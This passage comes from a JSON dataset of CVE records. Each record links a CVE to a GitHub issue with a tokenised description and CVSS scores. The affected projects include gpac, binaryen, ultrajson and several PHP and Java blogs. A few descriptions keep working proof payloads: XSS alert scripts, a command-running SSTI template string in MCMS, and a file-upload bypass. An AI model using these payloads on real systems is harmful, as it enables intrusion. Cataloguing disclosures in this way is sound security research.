  75743. "Issue_Url_new": "https://github.com/brave/brave-browser/issues/19070",
  75744. "Repo_new": "brave/brave-browser",
  75745. "Issue_Created_At": "2021-10-28T16:16:06Z",
  75746. "description": "hackerone NUMBERTAG CNAME Uncloacking in SOCKS5 protocol. URLTAG",
  75747. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  75748. "severity": "HIGH",
  75749. "baseScore": 7.5,
  75750. "impactScore": 3.6,
  75751. "exploitabilityScore": 3.9
  75752. },
  75753. {
  75754. "CVE_ID": "CVE-2021-45890",
  75755. "Issue_Url_old": "https://github.com/AuthGuard/AuthGuard/issues/166",
  75756. "Issue_Url_new": "https://github.com/authguard/authguard/issues/166",
  75757. "Repo_new": "authguard/authguard",
  75758. "Issue_Created_At": "2021-08-23T19:06:49Z",
  75759. "description": "Authentication ignores inactive identifiers.",
  75760. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75761. "severity": "CRITICAL",
  75762. "baseScore": 9.8,
  75763. "impactScore": 5.9,
  75764. "exploitabilityScore": 3.9
  75765. },
  75766. {
  75767. "CVE_ID": "CVE-2021-45928",
  75768. "Issue_Url_old": "https://github.com/libjxl/libjxl/issues/360",
  75769. "Issue_Url_new": "https://github.com/libjxl/libjxl/issues/360",
  75770. "Repo_new": "libjxl/libjxl",
  75771. "Issue_Created_At": "2021-07-26T11:42:15Z",
  75772. "description": "Out of bounds write in master libjxl reported by oss fuzz. Hello, oss fuzz is reporting an out of bounds write in libjxl master: ERRORTAG Reproducer: FILETAG APITAG testcase minimized NUMBERTAG jxl",
  75773. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  75774. "severity": "MEDIUM",
  75775. "baseScore": 5.5,
  75776. "impactScore": 3.6,
  75777. "exploitabilityScore": 1.8
  75778. },
  75779. {
  75780. "CVE_ID": "CVE-2021-45944",
  75781. "Issue_Url_old": "https://github.com/google/oss-fuzz-vulns/issues/16",
  75782. "Issue_Url_new": "https://github.com/google/oss-fuzz-vulns/issues/16",
  75783. "Repo_new": "google/oss-fuzz-vulns",
  75784. "Issue_Created_At": "2022-01-04T20:58:23Z",
  75785. "description": "Fixing commit from OS NUMBERTAG seems wrong. Hi URLTAG references a fixing commit which, however, only removes a documentation snippet. Unless my bisect is wrong, the following should be the fixing commit: URLTAG ERRORTAG",
  75786. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75787. "severity": "MEDIUM",
  75788. "baseScore": 5.5,
  75789. "impactScore": 3.6,
  75790. "exploitabilityScore": 1.8
  75791. },
  75792. {
  75793. "CVE_ID": "CVE-2021-45958",
  75794. "Issue_Url_old": "https://github.com/ultrajson/ultrajson/issues/501",
  75795. "Issue_Url_new": "https://github.com/ultrajson/ultrajson/issues/501",
  75796. "Repo_new": "ultrajson/ultrajson",
  75797. "Issue_Created_At": "2022-02-06T01:14:09Z",
  75798. "description": "Segmentation fault with large indent. What did you do? APITAG This is the smallest value that triggers the segfault on my machine with this build of ujson. I'm sure it's no coincidence that it's slightly larger than NUMBERTAG APITAG What did you expect to happen? Properly (if poorly) formatted output What actually happened? SIGSEGV What versions are you using? OS: Debian Sid Python NUMBERTAG APITAG NUMBERTAG d NUMBERTAG f I think the reason might lie in the fact that the APITAG call in encode does not appear to account for indentation at all. I wouldn't be surprised if other things could also trigger buffer overruns in certain conditions, e.g. the absence of APITAG causing the insertion of extra spaces NUMBERTAG and NUMBERTAG might be symptoms of the same underlying bug. Note that they both use indentation.",
  75799. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75800. "severity": "MEDIUM",
  75801. "baseScore": 5.5,
  75802. "impactScore": 3.6,
  75803. "exploitabilityScore": 1.8
  75804. },
  75805. {
  75806. "CVE_ID": "CVE-2021-45958",
  75807. "Issue_Url_old": "https://github.com/ultrajson/ultrajson/issues/502",
  75808. "Issue_Url_new": "https://github.com/ultrajson/ultrajson/issues/502",
  75809. "Repo_new": "ultrajson/ultrajson",
  75810. "Issue_Created_At": "2022-02-07T16:43:38Z",
  75811. "description": "CVETAG from oss fuzz report. Hi Recently CVETAG URLTAG was published which is an assignment due to the oss fuzz report in CVETAG see as well FILETAG This reference says: events: introduced: APITAG fixed: APITAG where though the APITAG refers to a change in the AFL++ fuzzer: URLTAG (see URLTAG Quoting a mail from MITRE: Some of the possibilities are NUMBERTAG There was never a buffer overflow. It was simply an artifact of an older version of the APITAG fuzzing software NUMBERTAG There still is a buffer overflow, but it is no longer detected. In particular, the introduced value above corresponds to URLTAG this has function names that mention the APITAG Append Unchecked\" words. One might guess that APITAG means accepting the risk of a buffer overflow. MITRE confirmed that the CVE could be rejected if it can be confirmed that the reproducer testcase from URLTAG does not have a buffer overflow for the APITAG call shown in FILETAG for APITAG NUMBERTAG Do you have any more insights here?",
  75812. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75813. "severity": "MEDIUM",
  75814. "baseScore": 5.5,
  75815. "impactScore": 3.6,
  75816. "exploitabilityScore": 1.8
  75817. },
  75818. {
  75819. "CVE_ID": "CVE-2021-45960",
  75820. "Issue_Url_old": "https://github.com/libexpat/libexpat/issues/531",
  75821. "Issue_Url_new": "https://github.com/libexpat/libexpat/issues/531",
  75822. "Repo_new": "libexpat/libexpat",
  75823. "Issue_Created_At": "2021-12-30T19:24:38Z",
  75824. "description": "Reserved NUMBERTAG security issue upcoming). TBA",
  75825. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  75826. "severity": "HIGH",
  75827. "baseScore": 8.8,
  75828. "impactScore": 5.9,
  75829. "exploitabilityScore": 2.8
  75830. },
  75831. {
  75832. "CVE_ID": "CVE-2021-46020",
  75833. "Issue_Url_old": "https://github.com/mruby/mruby/issues/5613",
  75834. "Issue_Url_new": "https://github.com/mruby/mruby/issues/5613",
  75835. "Repo_new": "mruby/mruby",
  75836. "Issue_Created_At": "2021-12-27T16:51:56Z",
  75837. "description": "Untrusted Pointer Dereference in APITAG Untrusted Pointer Dereference in APITAG Description An Untrusted Pointer Dereference was discovered in APITAG The vulnerability causes a segmentation fault and application crash. version NUMBERTAG de0fcb APITAG System information Ubuntu NUMBERTAG focal, AMD EPYC NUMBERTAG Core NUMBERTAG GHz Proof of Concept poc CODETAG command: APITAG Result APITAG gdb ERRORTAG",
  75838. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  75839. "severity": "HIGH",
  75840. "baseScore": 7.5,
  75841. "impactScore": 3.6,
  75842. "exploitabilityScore": 3.9
  75843. },
  75844. {
  75845. "CVE_ID": "CVE-2021-46024",
  75846. "Issue_Url_old": "https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/3",
  75847. "Issue_Url_new": "https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/3",
  75848. "Repo_new": "projectworldsofficial/online-shopping-webvsite-in-php",
  75849. "Issue_Created_At": "2021-12-28T02:29:39Z",
  75850. "description": "SQL Injection vulnerability via the \"id\" parameter in FILETAG . Version NUMBERTAG No login is required APITAG FILETAG Source code review FILETAG Remediation Validate input of id parameter in APITAG .",
  75851. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75852. "severity": "CRITICAL",
  75853. "baseScore": 9.8,
  75854. "impactScore": 5.9,
  75855. "exploitabilityScore": 3.9
  75856. },
  75857. {
  75858. "CVE_ID": "CVE-2021-46025",
  75859. "Issue_Url_old": "https://github.com/zhangyd-c/OneBlog/issues/27",
  75860. "Issue_Url_new": "https://github.com/zhangyd-c/oneblog/issues/27",
  75861. "Repo_new": "zhangyd-c/oneblog",
  75862. "Issue_Created_At": "2021-12-28T03:34:48Z",
  75863. "description": "A stored XSS vulnerability exists in APITAG APITAG alert(\"xss\") APITAG code FILETAG FILETAG",
  75864. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  75865. "severity": "MEDIUM",
  75866. "baseScore": 5.4,
  75867. "impactScore": 2.7,
  75868. "exploitabilityScore": 2.3
  75869. },
  75870. {
  75871. "CVE_ID": "CVE-2021-46026",
  75872. "Issue_Url_old": "https://github.com/wangl1989/mysiteforme/issues/39",
  75873. "Issue_Url_new": "https://github.com/wangl1989/mysiteforme/issues/39",
  75874. "Repo_new": "wangl1989/mysiteforme",
  75875. "Issue_Created_At": "2021-12-28T07:38:42Z",
  75876. "description": "There is a stored XSS vulnerability in mysiteforme. A Cross APITAG Scripting (XSS) vulnerability exists in mysiteforme. By accessing the add-blog-tag function in the background blog management and inserting the < script > alert (\"XSS\") APITAG code, an XSS window pops up on the page after the tag is added successfully. FILETAG FILETAG",
  75877. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  75878. "severity": "MEDIUM",
  75879. "baseScore": 5.4,
  75880. "impactScore": 2.7,
  75881. "exploitabilityScore": 2.3
  75882. },
  75883. {
  75884. "CVE_ID": "CVE-2021-46027",
  75885. "Issue_Url_old": "https://github.com/wangl1989/mysiteforme/issues/40",
  75886. "Issue_Url_new": "https://github.com/wangl1989/mysiteforme/issues/40",
  75887. "Repo_new": "wangl1989/mysiteforme",
  75888. "Issue_Created_At": "2021-12-29T06:10:07Z",
  75889. "description": "There is a stored XSS vulnerability in mysiteforme. There is a CSRF vulnerability in the background blog management. The attacker constructs a CSRF payload; once the administrator clicks a malicious link, a blog tag will be added. FILETAG FILETAG FILETAG FILETAG",
  75890. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  75891. "severity": "MEDIUM",
  75892. "baseScore": 6.5,
  75893. "impactScore": 3.6,
  75894. "exploitabilityScore": 2.8
  75895. },
  75896. {
  75897. "CVE_ID": "CVE-2021-46028",
  75898. "Issue_Url_old": "https://github.com/langhsu/mblog/issues/50",
  75899. "Issue_Url_new": "https://github.com/langhsu/mblog/issues/50",
  75900. "Repo_new": "langhsu/mblog",
  75901. "Issue_Created_At": "2021-12-30T06:21:03Z",
  75902. "description": "A CSRF vulnerability exists in APITAG. There is a CSRF vulnerability in the background article management. The attacker constructs a CSRF payload; once the administrator clicks a malicious link, the article will be deleted. FILETAG FILETAG FILETAG FILETAG",
  75903. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  75904. "severity": "MEDIUM",
  75905. "baseScore": 4.3,
  75906. "impactScore": 1.4,
  75907. "exploitabilityScore": 2.8
  75908. },
  75909. {
  75910. "CVE_ID": "CVE-2021-46030",
  75911. "Issue_Url_old": "https://github.com/ChinaLHR/JavaQuarkBBS/issues/23",
  75912. "Issue_Url_new": "https://github.com/chinalhr/javaquarkbbs/issues/23",
  75913. "Repo_new": "chinalhr/javaquarkbbs",
  75914. "Issue_Created_At": "2021-12-28T03:40:49Z",
  75915. "description": "There are two stored XSS in APITAG APITAG Description\u3011 There is a Cross Site Scripting attack (XSS) vulnerability in the full version of APITAG By entering specific statements into the background tag management module, the attack statement will be stored in the database, and the next victim will be attacked when he accesses the tag module. APITAG Type\u3011 Cross Site Scripting (XSS) APITAG Version NUMBERTAG APITAG Verification\u3011 Find the Background Label Management module, select the new location and enter APITAG FILETAG APITAG FILETAG APITAG Suggestions\u3011 Strict filtering of user input data",
  75916. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  75917. "severity": "MEDIUM",
  75918. "baseScore": 5.4,
  75919. "impactScore": 2.7,
  75920. "exploitabilityScore": 2.3
  75921. },
  75922. {
  75923. "CVE_ID": "CVE-2021-46033",
  75924. "Issue_Url_old": "https://github.com/saysky/ForestBlog/issues/69",
  75925. "Issue_Url_new": "https://github.com/saysky/forestblog/issues/69",
  75926. "Repo_new": "saysky/forestblog",
  75927. "Issue_Created_At": "2021-12-28T07:42:20Z",
  75928. "description": "File upload bypass exists. In this code, the verification suffix should verify the file type after the last point\uff1a public final String APITAG = APITAG / \u4e0a\u4f20\u6587\u4ef6 MENTIONTAG file MENTIONTAG MENTIONTAG ERRORTAG / APITAG = \"/img\", method = APITAG public APITAG APITAG APITAG file) { APITAG //\u6587\u4ef6\u7684\u5b8c\u6574\u540d\u79f0, APITAG String filename = APITAG //\u6587\u4ef6\u540d,\u5982spring String name = APITAG APITAG //\u6587\u4ef6\u540e\u7f00,\u5982.jpeg String suffix = APITAG if APITAG NUMBERTAG return new APITAG } example: FILETAG FILETAG",
  75929. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75930. "severity": "CRITICAL",
  75931. "baseScore": 9.8,
  75932. "impactScore": 5.9,
  75933. "exploitabilityScore": 3.9
  75934. },
  75935. {
  75936. "CVE_ID": "CVE-2021-46034",
  75937. "Issue_Url_old": "https://github.com/saysky/ForestBlog/issues/70",
  75938. "Issue_Url_new": "https://github.com/saysky/forestblog/issues/70",
  75939. "Repo_new": "saysky/forestblog",
  75940. "Issue_Created_At": "2021-12-29T07:16:11Z",
  75941. "description": "XSS vulnerability exists. There is no character verification for the nickname of the registration interface FILETAG The administrator clicks the user function to pop up the XSS prompt box FILETAG",
  75942. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  75943. "severity": "MEDIUM",
  75944. "baseScore": 6.1,
  75945. "impactScore": 2.7,
  75946. "exploitabilityScore": 2.8
  75947. },
  75948. {
  75949. "CVE_ID": "CVE-2021-46038",
  75950. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2000",
  75951. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2000",
  75952. "Repo_new": "gpac/gpac",
  75953. "Issue_Created_At": "2021-12-22T15:49:42Z",
  75954. "description": "untrusted pointer dereference APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result segmentation fault bt ERRORTAG",
  75955. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75956. "severity": "MEDIUM",
  75957. "baseScore": 5.5,
  75958. "impactScore": 3.6,
  75959. "exploitabilityScore": 1.8
  75960. },
  75961. {
  75962. "CVE_ID": "CVE-2021-46039",
  75963. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1999",
  75964. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1999",
  75965. "Repo_new": "gpac/gpac",
  75966. "Issue_Created_At": "2021-12-22T12:55:57Z",
  75967. "description": "untrusted pointer dereference in APITAG (). Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault. bt CODETAG",
  75968. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75969. "severity": "MEDIUM",
  75970. "baseScore": 5.5,
  75971. "impactScore": 3.6,
  75972. "exploitabilityScore": 1.8
  75973. },
  75974. {
  75975. "CVE_ID": "CVE-2021-46040",
  75976. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2003",
  75977. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2003",
  75978. "Repo_new": "gpac/gpac",
  75979. "Issue_Created_At": "2021-12-22T16:27:40Z",
  75980. "description": "Untrusted pointer dereference in APITAG (). Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt CODETAG",
  75981. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75982. "severity": "MEDIUM",
  75983. "baseScore": 5.5,
  75984. "impactScore": 3.6,
  75985. "exploitabilityScore": 1.8
  75986. },
  75987. {
  75988. "CVE_ID": "CVE-2021-46041",
  75989. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2004",
  75990. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2004",
  75991. "Repo_new": "gpac/gpac",
  75992. "Issue_Created_At": "2021-12-22T17:31:48Z",
  75993. "description": "Untrusted pointer dereference in co NUMBERTAG box_new (). Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt CODETAG",
  75994. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75995. "severity": "MEDIUM",
  75996. "baseScore": 5.5,
  75997. "impactScore": 3.6,
  75998. "exploitabilityScore": 1.8
  75999. },
  76000. {
  76001. "CVE_ID": "CVE-2021-46042",
  76002. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2002",
  76003. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2002",
  76004. "Repo_new": "gpac/gpac",
  76005. "Issue_Created_At": "2021-12-22T16:16:38Z",
  76006. "description": "Untrusted pointer dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault. bt ERRORTAG",
  76007. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76008. "severity": "MEDIUM",
  76009. "baseScore": 5.5,
  76010. "impactScore": 3.6,
  76011. "exploitabilityScore": 1.8
  76012. },
  76013. {
  76014. "CVE_ID": "CVE-2021-46043",
  76015. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2001",
  76016. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2001",
  76017. "Repo_new": "gpac/gpac",
  76018. "Issue_Created_At": "2021-12-22T16:04:39Z",
  76019. "description": "Untrusted Pointer Dereference in gf_list_count (). Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result segmentation fault bt CODETAG",
  76020. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76021. "severity": "MEDIUM",
  76022. "baseScore": 5.5,
  76023. "impactScore": 3.6,
  76024. "exploitabilityScore": 1.8
  76025. },
  76026. {
  76027. "CVE_ID": "CVE-2021-46044",
  76028. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2006",
  76029. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2006",
  76030. "Repo_new": "gpac/gpac",
  76031. "Issue_Created_At": "2021-12-22T18:20:11Z",
  76032. "description": "Untrusted pointer dereference in APITAG (). Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt CODETAG",
  76033. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76034. "severity": "MEDIUM",
  76035. "baseScore": 5.5,
  76036. "impactScore": 3.6,
  76037. "exploitabilityScore": 1.8
  76038. },
  76039. {
  76040. "CVE_ID": "CVE-2021-46045",
  76041. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2007",
  76042. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2007",
  76043. "Repo_new": "gpac/gpac",
  76044. "Issue_Created_At": "2021-12-22T18:37:49Z",
  76045. "description": "Abort failed in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Abort bt CODETAG",
  76046. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76047. "severity": "MEDIUM",
  76048. "baseScore": 5.5,
  76049. "impactScore": 3.6,
  76050. "exploitabilityScore": 1.8
  76051. },
  76052. {
  76053. "CVE_ID": "CVE-2021-46046",
  76054. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2005",
  76055. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2005",
  76056. "Repo_new": "gpac/gpac",
  76057. "Issue_Created_At": "2021-12-22T17:52:53Z",
  76058. "description": "Untrusted pointer dereference in gf_isom_box_size () . Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault. bt CODETAG",
  76059. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76060. "severity": "MEDIUM",
  76061. "baseScore": 5.5,
  76062. "impactScore": 3.6,
  76063. "exploitabilityScore": 1.8
  76064. },
  76065. {
  76066. "CVE_ID": "CVE-2021-46047",
  76067. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2008",
  76068. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2008",
  76069. "Repo_new": "gpac/gpac",
  76070. "Issue_Created_At": "2021-12-22T18:56:01Z",
  76071. "description": "Untrusted pointer dereference in gf_hinter_finalize (). Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Abort bt ERRORTAG",
  76072. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76073. "severity": "MEDIUM",
  76074. "baseScore": 5.5,
  76075. "impactScore": 3.6,
  76076. "exploitabilityScore": 1.8
  76077. },
  76078. {
  76079. "CVE_ID": "CVE-2021-46048",
  76080. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4412",
  76081. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4412",
  76082. "Repo_new": "webassembly/binaryen",
  76083. "Issue_Created_At": "2021-12-25T07:56:15Z",
  76084. "description": "An abort failure in APITAG. Version: APITAG command: APITAG FILETAG Result abort bt ERRORTAG",
  76085. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76086. "severity": "MEDIUM",
  76087. "baseScore": 5.5,
  76088. "impactScore": 3.6,
  76089. "exploitabilityScore": 1.8
  76090. },
  76091. {
  76092. "CVE_ID": "CVE-2021-46049",
  76093. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2013",
  76094. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2013",
  76095. "Repo_new": "gpac/gpac",
  76096. "Issue_Created_At": "2021-12-24T07:13:51Z",
  76097. "description": "Untrusted pointer dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt CODETAG",
  76098. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76099. "severity": "MEDIUM",
  76100. "baseScore": 5.5,
  76101. "impactScore": 3.6,
  76102. "exploitabilityScore": 1.8
  76103. },
  76104. {
  76105. "CVE_ID": "CVE-2021-46050",
  76106. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4391",
  76107. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4391",
  76108. "Repo_new": "webassembly/binaryen",
  76109. "Issue_Created_At": "2021-12-14T12:41:56Z",
  76110. "description": "Invalid memory address dereference in __vfprintf_internal (). Version: APITAG System information command: APITAG FILETAG Result APITAG GDB information ERRORTAG",
  76111. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76112. "severity": "MEDIUM",
  76113. "baseScore": 5.5,
  76114. "impactScore": 3.6,
  76115. "exploitabilityScore": 1.8
  76116. },
  76117. {
  76118. "CVE_ID": "CVE-2021-46051",
  76119. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2011",
  76120. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2011",
  76121. "Repo_new": "gpac/gpac",
  76122. "Issue_Created_At": "2021-12-24T06:14:20Z",
  76123. "description": "Untrusted pointer dereference in APITAG (). Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt CODETAG",
  76124. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76125. "severity": "MEDIUM",
  76126. "baseScore": 5.5,
  76127. "impactScore": 3.6,
  76128. "exploitabilityScore": 1.8
  76129. },
  76130. {
  76131. "CVE_ID": "CVE-2021-46052",
  76132. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4411",
  76133. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4411",
  76134. "Repo_new": "webassembly/binaryen",
  76135. "Issue_Created_At": "2021-12-25T07:43:44Z",
  76136. "description": "An abort failure in APITAG (). Version: APITAG command: APITAG FILETAG Result Aborted. bt ERRORTAG",
  76137. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76138. "severity": "MEDIUM",
  76139. "baseScore": 5.5,
  76140. "impactScore": 3.6,
  76141. "exploitabilityScore": 1.8
  76142. },
  76143. {
  76144. "CVE_ID": "CVE-2021-46053",
  76145. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4392",
  76146. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4392",
  76147. "Repo_new": "webassembly/binaryen",
  76148. "Issue_Created_At": "2021-12-14T12:53:22Z",
  76149. "description": "Program terminated with signal SIGKILL, Killed. Version: APITAG System information command: APITAG FILETAG Result Program terminated with signal SIGKILL, Killed.",
  76150. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76151. "severity": "MEDIUM",
  76152. "baseScore": 5.5,
  76153. "impactScore": 3.6,
  76154. "exploitabilityScore": 1.8
  76155. },
  76156. {
  76157. "CVE_ID": "CVE-2021-46054",
  76158. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4410",
  76159. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4410",
  76160. "Repo_new": "webassembly/binaryen",
  76161. "Issue_Created_At": "2021-12-25T07:10:11Z",
  76162. "description": "An abort failure in APITAG ). Version: APITAG command: APITAG FILETAG Result APITAG bt ERRORTAG",
  76163. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76164. "severity": "MEDIUM",
  76165. "baseScore": 5.5,
  76166. "impactScore": 3.6,
  76167. "exploitabilityScore": 1.8
  76168. },
  76169. {
  76170. "CVE_ID": "CVE-2021-46055",
  76171. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4413",
  76172. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4413",
  76173. "Repo_new": "webassembly/binaryen",
  76174. "Issue_Created_At": "2021-12-25T08:10:49Z",
  76175. "description": "An abort failure in APITAG. Version: APITAG command: APITAG FILETAG Result Aborted. bt ERRORTAG",
  76176. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76177. "severity": "MEDIUM",
  76178. "baseScore": 5.5,
  76179. "impactScore": 3.6,
  76180. "exploitabilityScore": 1.8
  76181. },
  76182. {
  76183. "CVE_ID": "CVE-2021-46062",
  76184. "Issue_Url_old": "https://github.com/ming-soft/MCMS/issues/59",
  76185. "Issue_Url_new": "https://github.com/ming-soft/mcms/issues/59",
  76186. "Repo_new": "ming-soft/mcms",
  76187. "Issue_Created_At": "2021-12-28T13:49:01Z",
  76188. "description": "APITAG any file. SSTI APITAG template is used in the project\uff0cand there is no secure configuration Insert the payload in the background > system settings > template management APITAG ${value(\"whoami\")} FILETAG PATHTAG There's a suffix check, it's written to the file FILETAG PATHTAG APITAG of this class is called FILETAG coverage PATHTAG APITAG the home page FILETAG Delete any file If the APITAG argument exists, the corresponding file is deleted FILETAG Call the APITAG FILETAG poc\uff1a APITAG destination",
  76189. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
  76190. "severity": "HIGH",
  76191. "baseScore": 7.1,
  76192. "impactScore": 5.2,
  76193. "exploitabilityScore": 1.8
  76194. },
  76195. {
  76196. "CVE_ID": "CVE-2021-46083",
  76197. "Issue_Url_old": "https://github.com/chenniqing/uscat/issues/1",
  76198. "Issue_Url_new": "https://github.com/chenniqing/uscat/issues/1",
  76199. "Repo_new": "chenniqing/uscat",
  76200. "Issue_Created_At": "2021-12-29T02:42:51Z",
  76201. "description": "There is a stored XSS vulnerability in uscat. FILETAG The sensitive input parameters are not filtered, resulting in malicious code at URL: URLTAG After it is parsed and executed, all users accessing this URL will be affected. FILETAG",
  76202. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  76203. "severity": "MEDIUM",
  76204. "baseScore": 5.4,
  76205. "impactScore": 2.7,
  76206. "exploitabilityScore": 2.3
  76207. },
  76208. {
  76209. "CVE_ID": "CVE-2021-46084",
  76210. "Issue_Url_old": "https://github.com/chenniqing/uscat/issues/2",
  76211. "Issue_Url_new": "https://github.com/chenniqing/uscat/issues/2",
  76212. "Repo_new": "chenniqing/uscat",
  76213. "Issue_Created_At": "2021-12-29T03:32:16Z",
  76214. "description": "There is a stored XSS vulnerability in uscat. FILETAG The XSS payload will be executed on the registration page on the front end of the website. Any user who opens the registration page (url: URLTAG ) will be affected. FILETAG",
  76215. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  76216. "severity": "MEDIUM",
  76217. "baseScore": 5.4,
  76218. "impactScore": 2.7,
  76219. "exploitabilityScore": 2.3
  76220. },
  76221. {
  76222. "CVE_ID": "CVE-2021-46085",
  76223. "Issue_Url_old": "https://github.com/zhangyd-c/OneBlog/issues/29",
  76224. "Issue_Url_new": "https://github.com/zhangyd-c/oneblog/issues/29",
  76225. "Repo_new": "zhangyd-c/oneblog",
  76226. "Issue_Created_At": "2021-12-29T09:33:16Z",
